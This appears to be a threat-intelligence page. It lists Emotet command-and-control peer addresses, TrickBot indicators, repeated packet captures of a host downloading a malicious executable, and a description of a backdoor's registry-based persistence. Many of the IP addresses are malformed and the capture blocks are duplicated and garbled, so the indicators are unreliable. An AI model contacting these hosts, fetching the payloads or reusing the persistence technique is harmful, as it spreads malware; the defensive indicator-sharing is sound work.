Text Example

Updated List of Emotet Banking Malware Trojan IP C2 Servers and Port Numbers

Emotet

Peers:
104.131.58132:8080
104.236.13772:8080
109.169.8613:8080
110.170.65146:80
111.125.7122:8080
112.218.134227:80
113.61.76239:80
116.48.138115:80
116.48.14832:80
118.36.70245:80
119.59.124163:8080
125.99.61162:7080
130.204.247253:80
138.68.1064:7080
139.162.11888:8080
14.160.93230:80
142.127.5763:8080
142.93.114137:8080
144.139.56105:80
144.217.117207:8080
149.62.173247:8080
151.237.36220:80
152.170.10899:443
159.203.204126:8080
163.172.40218:7080
165.228.19593:80
175.114.17883:443
178.79.163131:8080
181.198.20345:443
181.36.42205:443
181.61.143177:80
183.99.239141:80
185.160.2123:80
185.160.22926:80
185.86.148222:8080
186.15.8352:8080
186.68.48204:443
187.188.166192:8080
188.135.1549:80
188.216.24204:80
189.19.81181:443
190.100.153162:443
190.146.131105:8080
190.186.16423:80
190.195.129227:8090
190.210.184138:995
190.6.193152:8080
190.97.30167:990
191.103.7634:443
191.183.21190:80
192.241.14684:8080
2.139.158136:443
2.42.173240:80
2.44.16752:80
2.45.112134:80
200.119.11118:443
200.124.22532:80
200.58.83179:80
201.213.3259:80
203.130.069:80
203.25.1593:8080
207.154.20440:8080
212.237.5061:8080
212.71.237140:8080
217.199.160224:8080
219.75.66103:80
223.255.148134:80
37.120.185153:443
37.183.12132:80
37.187.663:8080
37.211.49127:80
45.50.177164:80
45.79.95107:443
45.8.136201:80
46.101.212195:8080
46.28.111142:7080
5.196.35138:7080
5.32.41106:80
5.88.2767:8080
50.28.51143:8080
51.255.165160:8080
58.171.3826:80
62.75.143100:7080
62.75.160178:8080
63.246.252234:80
63.248.1988:80
68.129.203162:443
68.174.15223:80
68.183.170114:8080
68.183.190199:8080
68.187.16028:443
69.163.3384:8080
72.29.55174:80
73.60.8210:80
74.59.18794:80
74.79.10355:80
77.27.22124:443
77.55.21177:8080
79.7.1141:80
80.11.15865:8080
81.157.23490:8080
82.196.15205:8080
82.36.10314:80
82.8.23251:80
83.165.78227:80
83.248.141198:80
85.152.208146:80
85.234.14394:8080
86.42.166147:80
87.106.46107:8080
87.106.7740:7080
91.117.8359:80
91.204.16319:8090
91.205.21557:7080
91.74.17546:80
91.83.93124:7080
93.144.22657:80
93.148.25290:80
93.67.154252:443
94.200.114162:80
96.126.12164:443
96.38.23410:80
96.61.113203:80
97.120.32227:80
97.81.12153:80
99.252.276:80

RED3.exe bhvaticanskeys.com 181.129.104.139.449 Trickbot Malware Banking Trojan

JA3 Fingerprint:f735bbc6b69723b9df7b0e7ef27872af
First seen:2018-10-02 18:04:16 UTC
Last seen:2020-01-15 05:53:57 UTC
Status:Blacklisted
Malware samples:1’816
Destination IPs:193
Malware:TrickBot
Listing date:2020-01-09 14:17:18

2020-01-16 06:18:01.857421 IP 192.168.86.25.56294 > 94.23.64.40.80: Flags [P.], seq 1:444, ack 1, win 64240, length 443: HTTP: GET /RED3.exe HTTP/1.1
E…..@…;…V.^.@(…P-C.>.ca.P…ch..GET /RED3.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, /
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: bbvaticanskeys.com
Connection: Keep-Alive
Cookie: SERVERID104280=112034|XiBGX|XiBGX

2020-01-16 06:18:01.968837 IP 94.23.64.40.80 > 192.168.86.25.56294: Flags [.], seq 1:1461, ack 444, win 30016, length 1460: HTTP: HTTP/1.1 200 OK
E…..@.1.{.^.@(..V..P…ca.-C..P.u@C…HTTP/1.1 200 OK
Date: Thu, 16 Jan 2020 11:18:02 GMT
Content-Type: application/x-msdownload
Content-Length: 544922
Server: Apache
Last-Modified: Mon, 13 Jan 2020 09:26:46 GMT
Accept-Ranges: bytes
Set-Cookie: SERVERID104280=112034|XiBGb|XiBGX; path=/
Cache-control: private
X-IPLB-Instance: 29688

MZ………………….@……………………………………… .!..L.!This program cannot be run in DOS mode..
$………CW..-…-…-…!…-…>…-.}.#…-…’…-…)…-…,…-…>…-.$.1…-…&…-.F.+…-.Rich..-……………..PE..

2020-01-16 06:18:01.857421 IP 192.168.86.25.56294 > 94.23.64.40.80: Flags [P.], seq 1:444, ack 1, win 64240, length 443: HTTP: GET /RED3.exe HTTP/1.1
E…..@…;…V.^.@(…P-C.>.ca.P…ch..GET /RED3.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, /
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: bbvaticanskeys.com
Connection: Keep-Alive
Cookie: SERVERID104280=112034|XiBGX|XiBGX

2020-01-16 06:18:01.968837 IP 94.23.64.40.80 > 192.168.86.25.56294: Flags [.], seq 1:1461, ack 444, win 30016, length 1460: HTTP: HTTP/1.1 200 OK
E…..@.1.{.^.@(..V..P…ca.-C..P.u@C…HTTP/1.1 200 OK
Date: Thu, 16 Jan 2020 11:18:02 GMT
Content-Type: application/x-msdownload
Content-Length: 544922
Server: Apache
Last-Modified: Mon, 13 Jan 2020 09:26:46 GMT
Accept-Ranges: bytes
Set-Cookie: SERVERID104280=112034|XiBGb|XiBGX; path=/
Cache-control: private
X-IPLB-Instance: 29688

MZ………………….@……………………………………… .!..L.!This program cannot be run in DOS mode..
$………CW..-…-…-…!…-…>…-.}.#…-…’…-…)…-…,…-…>…-.$.1…-…&…-.F.+…-.Rich..-……………..PE..

2020-01-16 06:20:49.039935 IP 5.182.211.44.443 > 192.168.86.25.56297: Flags [.], ack 96, win 229, length 0
E..(N0@.,……,..V…..Tu..d…P………….
2020-01-16 06:20:49.041211 IP 5.182.211.44.443 > 192.168.86.25.56297: Flags [.], seq 1:1461, ack 96, win 229, length 1460
E…N1@.,..G…,..V…..Tu..d…P………..Q…M…...#...a.5..$..}p./r./O.S...I. .p....@.....8j.....@.I..*...O.I../........... ... .. ...0..\0..D……..jj1……6K.z…>0.. *.H……..0J1.0 ..U….US1.0…U.
..Let’s Encrypt1#0!..U….Let’s Encrypt Authority X30…200115041028Z..200414041028Z0.1.0…U…
teene.site0..”0.. *.H………….0..
……..z=..1C……….U[4MH1.m…..q……….{..S$S.2..-…..i…(‘*.%…Q..r..hP55…….7.uO….@.”…..z…%%.A….0..t.s..y)…Im……….D.K.F+.~.I..%.w.PK….
..Mf…~<:…M..3{..&….G.. ..N…Q..Y..+.>Uu.7n.i…&…..~..m1Y.d].z…7…..j,..l..%……..o0..k0…U………..0…U.%..0…+………+…….0…U…….0.0…U……..a…<…6 ….1…0…U.#..0….Jjc.}….9..Ee…..0o..+……..c0a0…+…..0..”http://ocsp.int-x3.letsencrypt.org0/..+…..0..#http://cert.int-x3.letsencrypt.org/0%..U….0.. teene.site..www.teene.site0L..U. .E0C0…g…..07..+……….0(0&..+………http://cps.letsencrypt.org0…. +…..y…………v.oSv.1.1…..Q..w…….)…..7…..o../……G0E. g.[^…s..E.u.U…N….N…..!…!…z…../..Y.S..IN.l.K.hKW.}f8″..v…..}h…..#….W|W..j..a:.i……o../……G0E.!…..?”.<`?.y.n…=I..h……P…. b..E……M…0….v…,..JX.#..0.. *.H………….S…). ……..h..W….(….WV..jb.w.H!..>q.W.0A.:.{T. .E……:vZ.c….,L..Z#..E..7….I.S……..B.~……/.O”(..V.7/.h…..R.6.>..W5…..r1… …..).w……o….u…………..5._.Y…………PX…{n…-W….{…..g.L.Ew.9(K’…..R..
2020-01-16 06:20:49.042164 IP 5.182.211.44.443 > 192.168.86.25.56297: Flags [P.], seq 1461:2664, ack 96, win 229, length 1203
E…N2@.,..G…,..V…..Tu..d…P….(….8…P…C.nA……0…0..z…….
.AB…S.sj…..0.. *.H……..0?1$0″..U.
..Digital Signature Trust Co.1.0…U….DST Root CA X30…160317164046Z..210317164046Z0J1.0 ..U….US1.0…U.
..Let’s Encrypt1#0!..U….Let’s Encrypt Authority X30..”0.. *.H………….0..

…..]y..r.g..r.9.,.W.y~…F….O_..B.V..<.D.?.nFs..(2dn….#.vp..s#..d………R…- ww...g#.&.......7:......m.-.(.._.......? "....}..2w...$..n.X0.....x..,#A......Db.'.n..|... ....o....Z..x[S...~T..Y...B..R$...l...t.=..s..... ..Dh.q.p._....oN<..:7.L^l5._...._.....#KK.^qYkECFg".t.S...{u.x ...X%....Ej.EQ...];7.....%6....p.x..&...R2...+X.$V.Z..e......|!.r.. w.lv....-?Ysd.49 ...F...O...m..p.8...N....T...x...'.#.h..Q.P.%'..oo.'q...."._u...j.x.g…ep.N:$…..,..E….7..A-…..~.@…….8..+ 5…..H..…>.s`D=…\M..l…….’.C.]ZV…;.-..
..J. “…H.W-f.. .y.k…./{M …[.b.M…2~….UA0….LY..T(]…’.R!..c…….*5..7).S….h.O.]#(.]e….j…..
..uPt…,Q….[.wi68

2020-01-16 06:22:09.646400 IP 181.129.104.139.449 > 192.168.86.25.56300: Flags [.], ack 14707, win 484, length 0
E..(..@….S..h…V……..H…P…v………
2020-01-16 06:22:09.658336 IP 181.129.104.139.449 > 192.168.86.25.56300: Flags [.], ack 16167, win 507, length 0
E..(..@….R..h…V……..H..rP…q$……..
2020-01-16 06:22:09.658340 IP 181.129.104.139.449 > 192.168.86.25.56300: Flags [.], ack 17627, win 530, length 0
E..(..@….Q..h…V……..H..&P…kY……..
2020-01-16 06:22:09.658343 IP 181.129.104.139.449 > 192.168.86.25.56300: Flags [.], ack 19087, win 553, length 0
E..(..@….P..h…V……..H…P..)e………
2020-01-16 06:22:09.659263 IP 181.129.104.139.449 > 192.168.86.25.56300: Flags [.], ack 20547, win 575, length 0
E..(..@….O..h…V……..H…P..?_………
2020-01-16 06:22:09.659268 IP 181.129.104.139.449 > 192.168.86.25.56300: Flags [.], ack 23467, win 621, length 0
E..(..@….N..h…V……..H…P..mT………
2020-01-16 06:22:09.659271 IP 181.129.104.139.449 > 192.168.86.25.56300: Flags [.], ack 24633, win 644, length 0
E..(..@….M..h…V……..H…P…O………
2020-01-16 06:22:10.237209 ARP, Request who-has 192.168.86.25 (00:0c:29:6d:82:4f) tell 192.168.86.1, length 46

RED3.exe bhvaticanskeys.com 181.129.104.139.449 Trickbot Malware Banking Trojan PCAP download traffic sample

JA3 Fingerprint:f735bbc6b69723b9df7b0e7ef27872af
First seen:2018-10-02 18:04:16 UTC
Last seen:2020-01-15 05:53:57 UTC
Status:Blacklisted
Malware samples:1’816
Destination IPs:193
Malware:TrickBot
Listing date:2020-01-09 14:17:18

2020-01-16 06:18:01.857421 IP 192.168.86.25.56294 > 94.23.64.40.80: Flags [P.], seq 1:444, ack 1, win 64240, length 443: HTTP: GET /RED3.exe HTTP/1.1
E…..@…;…V.^.@(…P-C.>.ca.P…ch..GET /RED3.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, /
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: bbvaticanskeys.com
Connection: Keep-Alive
Cookie: SERVERID104280=112034|XiBGX|XiBGX

2020-01-16 06:18:01.968837 IP 94.23.64.40.80 > 192.168.86.25.56294: Flags [.], seq 1:1461, ack 444, win 30016, length 1460: HTTP: HTTP/1.1 200 OK
E…..@.1.{.^.@(..V..P…ca.-C..P.u@C…HTTP/1.1 200 OK
Date: Thu, 16 Jan 2020 11:18:02 GMT
Content-Type: application/x-msdownload
Content-Length: 544922
Server: Apache
Last-Modified: Mon, 13 Jan 2020 09:26:46 GMT
Accept-Ranges: bytes
Set-Cookie: SERVERID104280=112034|XiBGb|XiBGX; path=/
Cache-control: private
X-IPLB-Instance: 29688

MZ………………….@……………………………………… .!..L.!This program cannot be run in DOS mode..
$………CW..-…-…-…!…-…>…-.}.#…-…’…-…)…-…,…-…>…-.$.1…-…&…-.F.+…-.Rich..-……………..PE..

2020-01-16 06:20:49.039935 IP 5.182.211.44.443 > 192.168.86.25.56297: Flags [.], ack 96, win 229, length 0
E..(N0@.,……,..V…..Tu..d…P………….
2020-01-16 06:20:49.041211 IP 5.182.211.44.443 > 192.168.86.25.56297: Flags [.], seq 1:1461, ack 96, win 229, length 1460
E…N1@.,..G…,..V…..Tu..d…P………..Q…M…...#...a.5..$..}p./r./O.S...I. .p....@.....8j.....@.I..*...O.I../........... ... .. ...0..\0..D……..jj1……6K.z…>0.. *.H……..0J1.0 ..U….US1.0…U.
..Let’s Encrypt1#0!..U….Let’s Encrypt Authority X30…200115041028Z..200414041028Z0.1.0…U…
teene.site0..”0.. *.H………….0..
……..z=..1C……….U[4MH1.m…..q……….{..S$S.2..-…..i…(‘*.%…Q..r..hP55…….7.uO….@.”…..z…%%.A….0..t.s..y)…Im……….D.K.F+.~.I..%.w.PK….
..Mf…~<:…M..3{..&….G.. ..N…Q..Y..+.>Uu.7n.i…&…..~..m1Y.d].z…7…..j,..l..%……..o0..k0…U………..0…U.%..0…+………+…….0…U…….0.0…U……..a…<…6 ….1…0…U.#..0….Jjc.}….9..Ee…..0o..+……..c0a0…+…..0..”http://ocsp.int-x3.letsencrypt.org0/..+…..0..#http://cert.int-x3.letsencrypt.org/0%..U….0.. teene.site..www.teene.site0L..U. .E0C0…g…..07..+……….0(0&..+………http://cps.letsencrypt.org0…. +…..y…………v.oSv.1.1…..Q..w…….)…..7…..o../……G0E. g.[^…s..E.u.U…N….N…..!…!…z…../..Y.S..IN.l.K.hKW.}f8″..v…..}h…..#….W|W..j..a:.i……o../……G0E.!…..?”.<`?.y.n…=I..h……P…. b..E……M…0….v…,..JX.#..0.. *.H………….S…). ……..h..W….(….WV..jb.w.H!..>q.W.0A.:.{T. .E……:vZ.c….,L..Z#..E..7….I.S……..B.~……/.O”(..V.7/.h…..R.6.>..W5…..r1… …..).w……o….u…………..5._.Y…………PX…{n…-W….{…..g.L.Ew.9(K’…..R..
2020-01-16 06:20:49.042164 IP 5.182.211.44.443 > 192.168.86.25.56297: Flags [P.], seq 1461:2664, ack 96, win 229, length 1203
E…N2@.,..G…,..V…..Tu..d…P….(….8…P…C.nA……0…0..z…….
.AB…S.sj…..0.. *.H……..0?1$0″..U.
..Digital Signature Trust Co.1.0…U….DST Root CA X30…160317164046Z..210317164046Z0J1.0 ..U….US1.0…U.
..Let’s Encrypt1#0!..U….Let’s Encrypt Authority X30..”0.. *.H………….0..

…..]y..r.g..r.9.,.W.y~…F….O_..B.V..<.D.?.nFs..(2dn….#.vp..s#..d………R…- ww...g#.&.......7:......m.-.(.._.......? "....}..2w...$..n.X0.....x..,#A......Db.'.n..|... ....o....Z..x[S...~T..Y...B..R$...l...t.=..s..... ..Dh.q.p._....oN<..:7.L^l5._...._.....#KK.^qYkECFg".t.S...{u.x ...X%....Ej.EQ...];7.....%6....p.x..&...R2...+X.$V.Z..e......|!.r.. w.lv....-?Ysd.49 ...F...O...m..p.8...N....T...x...'.#.h..Q.P.%'..oo.'q...."._u...j.x.g…ep.N:$…..,..E….7..A-…..~.@…….8..+ 5…..H..…>.s`D=…\M..l…….’.C.]ZV…;.-..
..J. “…H.W-f.. .y.k…./{M …[.b.M…2~….UA0….LY..T(]…’.R!..c…….*5..7).S….h.O.]#(.]e….j…..
..uPt…,Q….[.wi68

2020-01-16 06:22:09.646400 IP 181.129.104.139.449 > 192.168.86.25.56300: Flags [.], ack 14707, win 484, length 0
E..(..@….S..h…V……..H…P…v………
2020-01-16 06:22:09.658336 IP 181.129.104.139.449 > 192.168.86.25.56300: Flags [.], ack 16167, win 507, length 0
E..(..@….R..h…V……..H..rP…q$……..
2020-01-16 06:22:09.658340 IP 181.129.104.139.449 > 192.168.86.25.56300: Flags [.], ack 17627, win 530, length 0
E..(..@….Q..h…V……..H..&P…kY……..
2020-01-16 06:22:09.658343 IP 181.129.104.139.449 > 192.168.86.25.56300: Flags [.], ack 19087, win 553, length 0
E..(..@….P..h…V……..H…P..)e………
2020-01-16 06:22:09.659263 IP 181.129.104.139.449 > 192.168.86.25.56300: Flags [.], ack 20547, win 575, length 0
E..(..@….O..h…V……..H…P..?_………
2020-01-16 06:22:09.659268 IP 181.129.104.139.449 > 192.168.86.25.56300: Flags [.], ack 23467, win 621, length 0
E..(..@….N..h…V……..H…P..mT………
2020-01-16 06:22:09.659271 IP 181.129.104.139.449 > 192.168.86.25.56300: Flags [.], ack 24633, win 644, length 0
E..(..@….M..h…V……..H…P…O………
2020-01-16 06:22:10.237209 ARP, Request who-has 192.168.86.25 (00:0c:29:6d:82:4f) tell 192.168.86.1, length 46

JA3 Fingerprint:f735bbc6b69723b9df7b0e7ef27872af
First seen:2018-10-02 18:04:16 UTC
Last seen:2020-01-15 05:53:57 UTC
Status:Blacklisted
Malware samples:1’816
Destination IPs:193
Malware:TrickBot
Listing date:2020-01-09 14:17:18

2020-01-16 06:18:01.857421 IP 192.168.86.25.56294 > 94.23.64.40.80: Flags [P.], seq 1:444, ack 1, win 64240, length 443: HTTP: GET /RED3.exe HTTP/1.1
E…..@…;…V.^.@(…P-C.>.ca.P…ch..GET /RED3.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, /
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: bbvaticanskeys.com
Connection: Keep-Alive
Cookie: SERVERID104280=112034|XiBGX|XiBGX

2020-01-16 06:18:01.968837 IP 94.23.64.40.80 > 192.168.86.25.56294: Flags [.], seq 1:1461, ack 444, win 30016, length 1460: HTTP: HTTP/1.1 200 OK
E…..@.1.{.^.@(..V..P…ca.-C..P.u@C…HTTP/1.1 200 OK
Date: Thu, 16 Jan 2020 11:18:02 GMT
Content-Type: application/x-msdownload
Content-Length: 544922
Server: Apache
Last-Modified: Mon, 13 Jan 2020 09:26:46 GMT
Accept-Ranges: bytes
Set-Cookie: SERVERID104280=112034|XiBGb|XiBGX; path=/
Cache-control: private
X-IPLB-Instance: 29688

MZ………………….@……………………………………… .!..L.!This program cannot be run in DOS mode..
$………CW..-…-…-…!…-…>…-.}.#…-…’…-…)…-…,…-…>…-.$.1…-…&…-.F.+…-.Rich..-……………..PE..

2020-01-16 06:20:49.039935 IP 5.182.211.44.443 > 192.168.86.25.56297: Flags [.], ack 96, win 229, length 0
E..(N0@.,……,..V…..Tu..d…P………….
2020-01-16 06:20:49.041211 IP 5.182.211.44.443 > 192.168.86.25.56297: Flags [.], seq 1:1461, ack 96, win 229, length 1460
E…N1@.,..G…,..V…..Tu..d…P………..Q…M…...#...a.5..$..}p./r./O.S...I. .p....@.....8j.....@.I..*...O.I../........... ... .. ...0..\0..D……..jj1……6K.z…>0.. *.H……..0J1.0 ..U….US1.0…U.
..Let’s Encrypt1#0!..U….Let’s Encrypt Authority X30…200115041028Z..200414041028Z0.1.0…U…
teene.site0..”0.. *.H………….0..
……..z=..1C……….U[4MH1.m…..q……….{..S$S.2..-…..i…(‘*.%…Q..r..hP55…….7.uO….@.”…..z…%%.A….0..t.s..y)…Im……….D.K.F+.~.I..%.w.PK….
..Mf…~<:…M..3{..&….G.. ..N…Q..Y..+.>Uu.7n.i…&…..~..m1Y.d].z…7…..j,..l..%……..o0..k0…U………..0…U.%..0…+………+…….0…U…….0.0…U……..a…<…6 ….1…0…U.#..0….Jjc.}….9..Ee…..0o..+……..c0a0…+…..0..”http://ocsp.int-x3.letsencrypt.org0/..+…..0..#http://cert.int-x3.letsencrypt.org/0%..U….0.. teene.site..www.teene.site0L..U. .E0C0…g…..07..+……….0(0&..+………http://cps.letsencrypt.org0…. +…..y…………v.oSv.1.1…..Q..w…….)…..7…..o../……G0E. g.[^…s..E.u.U…N….N…..!…!…z…../..Y.S..IN.l.K.hKW.}f8″..v…..}h…..#….W|W..j..a:.i……o../……G0E.!…..?”.<`?.y.n…=I..h……P…. b..E……M…0….v…,..JX.#..0.. *.H………….S…). ……..h..W….(….WV..jb.w.H!..>q.W.0A.:.{T. .E……:vZ.c….,L..Z#..E..7….I.S……..B.~……/.O”(..V.7/.h…..R.6.>..W5…..r1… …..).w……o….u…………..5._.Y…………PX…{n…-W….{…..g.L.Ew.9(K’…..R..
2020-01-16 06:20:49.042164 IP 5.182.211.44.443 > 192.168.86.25.56297: Flags [P.], seq 1461:2664, ack 96, win 229, length 1203
E…N2@.,..G…,..V…..Tu..d…P….(….8…P…C.nA……0…0..z…….
.AB…S.sj…..0.. *.H……..0?1$0″..U.
..Digital Signature Trust Co.1.0…U….DST Root CA X30…160317164046Z..210317164046Z0J1.0 ..U….US1.0…U.
..Let’s Encrypt1#0!..U….Let’s Encrypt Authority X30..”0.. *.H………….0..

…..]y..r.g..r.9.,.W.y~…F….O_..B.V..<.D.?.nFs..(2dn….#.vp..s#..d………R…- ww...g#.&.......7:......m.-.(.._.......? "....}..2w...$..n.X0.....x..,#A......Db.'.n..|... ....o....Z..x[S...~T..Y...B..R$...l...t.=..s..... ..Dh.q.p._....oN<..:7.L^l5._...._.....#KK.^qYkECFg".t.S...{u.x ...X%....Ej.EQ...];7.....%6....p.x..&...R2...+X.$V.Z..e......|!.r.. w.lv....-?Ysd.49 ...F...O...m..p.8...N....T...x...'.#.h..Q.P.%'..oo.'q...."._u...j.x.g…ep.N:$…..,..E….7..A-…..~.@…….8..+ 5…..H..…>.s`D=…\M..l…….’.C.]ZV…;.-..
..J. “…H.W-f.. .y.k…./{M …[.b.M…2~….UA0….LY..T(]…’.R!..c…….*5..7).S….h.O.]#(.]e….j…..
..uPt…,Q….[.wi68

2020-01-16 06:22:09.646400 IP 181.129.104.139.449 > 192.168.86.25.56300: Flags [.], ack 14707, win 484, length 0
E..(..@….S..h…V……..H…P…v………
2020-01-16 06:22:09.658336 IP 181.129.104.139.449 > 192.168.86.25.56300: Flags [.], ack 16167, win 507, length 0
E..(..@….R..h…V……..H..rP…q$……..
2020-01-16 06:22:09.658340 IP 181.129.104.139.449 > 192.168.86.25.56300: Flags [.], ack 17627, win 530, length 0
E..(..@….Q..h…V……..H..&P…kY……..
2020-01-16 06:22:09.658343 IP 181.129.104.139.449 > 192.168.86.25.56300: Flags [.], ack 19087, win 553, length 0
E..(..@….P..h…V……..H…P..)e………
2020-01-16 06:22:09.659263 IP 181.129.104.139.449 > 192.168.86.25.56300: Flags [.], ack 20547, win 575, length 0
E..(..@….O..h…V……..H…P..?_………
2020-01-16 06:22:09.659268 IP 181.129.104.139.449 > 192.168.86.25.56300: Flags [.], ack 23467, win 621, length 0
E..(..@….N..h…V……..H…P..mT………
2020-01-16 06:22:09.659271 IP 181.129.104.139.449 > 192.168.86.25.56300: Flags [.], ack 24633, win 644, length 0
E..(..@….M..h…V……..H…P…O………
2020-01-16 06:22:10.237209 ARP, Request who-has 192.168.86.25 (00:0c:29:6d:82:4f) tell 192.168.86.1, length 46

Trojan Malware BDaim-A is c000.exe vbc.exe Malicious X.509 SSL Certificate PCAP File Download Traffic Sample

Troj/BDaim-A is a backdoor trojan.

The Trojan installs itself as uvwxyz.exe in system folder of Windows and creates the following files, also in the system folder:

mswinsck.ocx (This is clean microsoft socket control)
raim.ocx

Troj/BDaim-A creates the following registry entry so that it automatically starts up with Windows:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\uvwxyz = C:\WINDOWS\System32\uvwxyz.exe

In addition, Troj/BDaim-A creates the following registry entries:

HKCU\Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Server\
HKCU\Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Server\Host = “localhost”
HKCU\Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Server\Port = dword:0000103f
HKCU\Software\Microsoft\Visual Basic\
HKCU\Software\Microsoft\Visual Basic\6.0\
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D)\
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) (default) = “Microsoft WinSock Control, version 6.0”
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \Control\
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \Implemented Categories\
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \Implemented Categories(0DE86A52-2BAA-11CF-A229-00AA003D7352)\
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \Implemented Categories(0DE86A53-2BAA-11CF-A229-00AA003D7352)\
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \Implemented Categories(0DE86A57-2BAA-11CF-A229-00AA003D7352)\
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \Implemented Categories(40FC6ED4-2438-11CF-A3DB-080036F12502)\
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \Implemented Categories(40FC6ED5-2438-11CF-A3DB-080036F12502)\
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \InprocServer32\
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \InprocServer32(default) = “C:\WINDOWS\System32\MSWINSCK.OCX”
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \InprocServer32\ThreadingModel = “Apartment”
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \MiscStatus\
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \MiscStatus(default) = “0”
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \MiscStatus\1\
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \MiscStatus\1(default) = “132497”
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \ProgID\
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \ProgID(default) = “MSWinsock.Winsock.1”
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \Programmable\
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \ToolboxBitmap32\
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \ToolboxBitmap32(default) = “C:\WINDOWS\System32\MSWINSCK.OCX, 1”
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \TypeLib\
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \TypeLib(default) = “(248DD890-BB45-11CF-9ABC-0080C7E7B78D)”
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \Version\
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \Version(default) = “1.0”
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \VersionIndependentProgID\
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \VersionIndependentProgID(default) = “MSWinsock.Winsock”
HKCR\CLSID(248DD897-BB45-11CF-9ABC-0080C7E7B78D)\
HKCR\CLSID(248DD897-BB45-11CF-9ABC-0080C7E7B78D) (default) = “Winsock General Property Page Object”
HKCR\CLSID(248DD897-BB45-11CF-9ABC-0080C7E7B78D) \InprocServer32\
HKCR\CLSID(248DD897-BB45-11CF-9ABC-0080C7E7B78D) \InprocServer32(default) = “C:\WINDOWS\System32\MSWINSCK.OCX”
HKCR\Interface(248DD892-BB45-11CF-9ABC-0080C7E7B78D)\
HKCR\Interface(248DD892-BB45-11CF-9ABC-0080C7E7B78D) (default) = “IMSWinsockControl”
HKCR\Interface(248DD892-BB45-11CF-9ABC-0080C7E7B78D) \ProxyStubClsid\
HKCR\Interface(248DD892-BB45-11CF-9ABC-0080C7E7B78D) \ProxyStubClsid(default) = “(00020424-0000-0000-C000-000000000046)”
HKCR\Interface(248DD892-BB45-11CF-9ABC-0080C7E7B78D) \ProxyStubClsid32\
HKCR\Interface(248DD892-BB45-11CF-9ABC-0080C7E7B78D) \ProxyStubClsid32(default) = “(00020424-0000-0000-C000-000000000046)”
HKCR\Interface(248DD892-BB45-11CF-9ABC-0080C7E7B78D) \TypeLib\
HKCR\Interface(248DD892-BB45-11CF-9ABC-0080C7E7B78D) \TypeLib(default) = “(248DD890-BB45-11CF-9ABC-0080C7E7B78D)”
HKCR\Interface(248DD892-BB45-11CF-9ABC-0080C7E7B78D) \TypeLib\Version = “1.0”
HKCR\Interface(248DD893-BB45-11CF-9ABC-0080C7E7B78D)\
HKCR\Interface(248DD893-BB45-11CF-9ABC-0080C7E7B78D) (default) = “DMSWinsockControlEvents”
HKCR\Interface(248DD893-BB45-11CF-9ABC-0080C7E7B78D) \ProxyStubClsid\
HKCR\Interface(248DD893-BB45-11CF-9ABC-0080C7E7B78D) \ProxyStubClsid(default) = “(00020420-0000-0000-C000-000000000046)”
HKCR\Interface(248DD893-BB45-11CF-9ABC-0080C7E7B78D) \ProxyStubClsid32\
HKCR\Interface(248DD893-BB45-11CF-9ABC-0080C7E7B78D) \ProxyStubClsid32(default) = “(00020420-0000-0000-C000-000000000046)”
HKCR\Interface(248DD893-BB45-11CF-9ABC-0080C7E7B78D) \TypeLib\
